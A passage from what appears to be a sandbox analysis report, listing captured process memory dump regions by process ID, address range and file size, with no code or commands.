                                                                                                                                124KB

                                                                                                                              • memory/1368-220-0x00000000010C0000-0x0000000001A00000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                9.2MB

                                                                                                                              • memory/1616-123-0x0000000002424000-0x0000000002427000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                              • memory/1616-124-0x000000000242B000-0x000000000244A000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                124KB

                                                                                                                              • memory/1616-121-0x000007FEF2310000-0x000007FEF2E6D000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                11.4MB

                                                                                                                              • memory/1616-120-0x000007FEF2F30000-0x000007FEF3953000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.1MB

                                                                                                                              • memory/1668-54-0x0000000075071000-0x0000000075073000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/2012-98-0x00000000028B4000-0x00000000028B7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                              • memory/2012-99-0x000000001B860000-0x000000001BB5F000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                3.0MB

                                                                                                                              • memory/2012-102-0x00000000028BB000-0x00000000028DA000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                124KB

                                                                                                                              • memory/2012-95-0x000007FEFB821000-0x000007FEFB823000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                8KB

                                                                                                                              • memory/2012-101-0x00000000028B4000-0x00000000028B7000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                12KB

                                                                                                                              • memory/2012-97-0x000007FEF2C70000-0x000007FEF37CD000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                11.4MB

                                                                                                                              • memory/2012-96-0x000007FEF37D0000-0x000007FEF41F3000-memory.dmp

                                                                                                                                Filesize

                                                                                                                                10.1MB